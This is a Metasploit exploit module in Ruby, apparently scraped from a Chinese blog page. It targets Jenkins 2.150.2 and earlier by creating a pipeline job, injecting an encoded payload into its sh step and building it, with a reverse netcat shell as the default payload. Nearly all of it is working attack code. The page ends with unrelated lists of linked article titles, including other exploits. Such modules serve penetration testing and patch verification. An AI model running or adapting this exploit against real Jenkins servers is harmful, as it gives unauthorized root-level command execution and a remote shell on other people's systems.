##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',

          'Description'    => %q{

                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.

                  The vulnerability is exploited by a small script prepared in NodeJS.

                  The sh parameter allows us to run commands.

                  Sample script:

                                node {

                                      sh "whoami"

                                }

                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.

                  Therefore, all users without console authority can run commands on the system as root privilege.

          },

          'Author'         => [

            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module

          ],

          'License'        => MSF_LICENSE,

          'References'     =>

            [

              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']

            ],

          'Privileged'     => true,

          'Payload'        =>

            {

              'DisableNops' => true,

              'Space'       => 512,

              'Compat'      =>

                {

                  'PayloadType' => 'cmd',

                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',

                }

            },

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],

          'DisclosureDate' => 'Feb 11 2019',

          'DefaultTarget'  => 0,

          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(

            [

                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),

                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),

                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),

            ], self.class)

    end

##

# Jenkins activity check

##

    def check

        res = send_request_cgi({'uri' => "/login"})

        if res and res.headers.include?('X-Jenkins')

            return Exploit::CheckCode::Detected

        else

            return Exploit::CheckCode::Safe

        end

    end

    def exploit

        print_status('Attempting to login to Jenkins dashboard')

        res = send_request_cgi({'uri' => "/script"})

        if not (res and res.code)

            fail_with(Exploit::Failure::Unknown)

        end

        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]

        @cookie = "#{sessionid}"

    print_status("#{sessionid}")

        if res.code != 200

            print_status('Logging in...')

##

# Access control and information

##

            res = send_request_cgi({

                'method'    => 'POST',

                'uri'       => "/j_acegi_security_check",

                'cookie'    => @cookie,

                'vars_post' =>

                    {

                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),

                        'Submit'     => 'Sign+in'

                    }

            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/

                print_error('User Login failed. If anonymous login is active, exploit will continue.')

            end

        else

            print_status('No authentication required, skipping login...')

        end

##

# Check Crumb for create pipeline

##

    cookies = res.get_cookies

        res = send_request_cgi({

        'method' => 'GET',

            'uri' => "/view/all/newJob",

            'cookie'  => cookies

        })

        html = res.body

        if html =~ /Jenkins-Crumb/

          print_good("Login Successful")

        else

          print_status("Service found, but login failed")

          exit 0

        end

    crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last

        print_status("Jenkins-Crumb: #{crumb}")

##

# Create Pipeline

##

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/view/all/createItem",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'name' => "cmd",

                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",

                    'from' => "",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"

                }

        })

##

# Configure Pipeline

##

        shell = payload.encoded

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/configSubmit",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'description' => "cmd",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",

                    'Submit' => "Save"

                }

        })

        if res.code == 302

          print_good("Pipeline was created and Node JS code was integrated.")

        end

##

# Build Pipeline and Execute payload

##

        print_status("Trying to get remote shell...")

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/build?delay=0sec",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'Jenkins-Crumb' => "#{crumb}"

                }

        })

    handler

    end

end

##

# End

##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. C# dns.gethostentry()获取失败,提示不存在主机

    传入参数domain有误. 如果是域名,可以解析.如果是局域ip可以解析. 如果是外网,解析不成功. 解决方法: 判断传入参数是域名还是ip,如果是域名,则使用dns.gethostentry(dom ...

  2. Python自动化测试用例设计--测试类型

    1.前言 WEB自动化测试时候测试哪些类型,下面将介绍一下: 2. 测试类型 2.1 测试静态内容 静态内容测试是最简单的测试,用于验证静态的.不变化的UI 元素的存在性.例如: 每个页面都有其预期的 ...

  3. CentOS7配置samba服务

    Step1:安装samba相关软件 [root@node-1 ~]# yum -y install samba samba-client Step2:创建共享目录 [root@node-1 ~]# m ...

  4. H3C网络设备配置SSH登录

    使用SSH+密码认证(基本SSH配置方法)注:在用户使用SSH登录交换机时,交换机对所要登录的用户使用密码对其进行身份验证生成RSA和DSA密钥对[H3C]public-key local creat ...

  5. Linux云服务器

    1. 第一步:前往阿里云官网注册账号,实名认证.进去云服务器,创建实例! 第二步:选配置,**公网IP地址选择“分配”!**如果你是首次购买主机,安全组先不必勾选,或者勾选默认的 .后面,会有安全组的 ...

  6. python 文件读写方式

    一.普通文件读写方式 1.读取文件信息: with open('/path/to/file', 'r') as f: content = f.read() 2.写入文件中: with open('/U ...

  7. FortiGate外网IPSec链路及运维专线链路到个别网段不通

    1.现状: 如图,用户网段有192.168.50.0/24.192.168.51.0/24和192.168.52.0/24.192.168.53.0/24.在防火墙上有静态路由到运维专线的10.160 ...

  8. FortiGate日常检查

    1.1)CPU利用率:由于防火墙有芯片,正常的流量都走芯片转发,不走cpu,只有开了utm相关的应用层防护功能和DDOS之类的,才会走cpu,所以一般cpu都不会占用太多,甚至很多时间都是0%, 如果 ...

  9. [leetcode]20. Valid Parentheses有效括号序列

    Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the inpu ...

  10. Nginx学习笔记(反向代理&搭建集群)

    一.前言 1.1 大型互联网架构演变历程 1.1.1 淘宝技术 淘宝的核心技术(国内乃至国际的 Top,这还是2011年的数据) 拥有全国最大的分布式 Hadoop 集群(云梯,2000左右节点,24 ...